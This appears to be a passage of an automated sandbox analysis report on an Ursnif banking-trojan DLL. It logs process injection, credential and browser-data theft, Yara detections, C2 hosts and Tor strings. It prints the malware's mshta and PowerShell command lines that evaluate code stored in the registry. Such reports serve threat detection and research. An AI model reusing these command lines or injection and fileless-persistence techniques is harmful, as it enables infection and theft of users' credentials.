File written: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EC000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 4980000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 6752	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 5772
Source: C:\Windows\explorer.exe	Thread register set: target process: 6228
Source: C:\Windows\explorer.exe	Thread register set: target process: 6020
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5528

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF672E412E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 1050000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF672E412E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EC000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 4980000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 284AA390000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Source: explorer.exe, 0000001E.00000000.830065181.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02675F3A cpuid

0_2_02675F3A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0111179C GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_0111179C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02675F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_02675F3A

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_01111CE1 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_01111CE1

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Contains VNC / remote desktop functionality (version string found)

Source: control.exe, 00000020.00000003.854967978.000001A77A0DC000.00000004.00000040.sdmp	String found in binary or memory: \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmp	String found in binary or memory: GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmp	String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmp	String found in binary or memory: GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmp	String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmp	String found in binary or memory: GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmp	String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.212.47.223	unknown	Sweden		39378	SERVINGADE	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
resolver1.opendns.com	208.67.222.222	true
1.0.0.127.in-addr.arpa	unknown	unknown
8.8.8.8.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi	false	Avira URL Cloud: safe	unknown
http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi	false	Avira URL Cloud: safe	unknown
http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: explorer.exe.3424.30.memstr

Multi AV Scanner detection for submitted file

Source: https___purefile24.top_4352wedfoifom.dll

ReversingLabs: Detection: 14%

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.loaddll32.exe.1110000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.loaddll32.exe.1100000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\System32\loaddll32.exe

0_2_026742B4

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp	String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
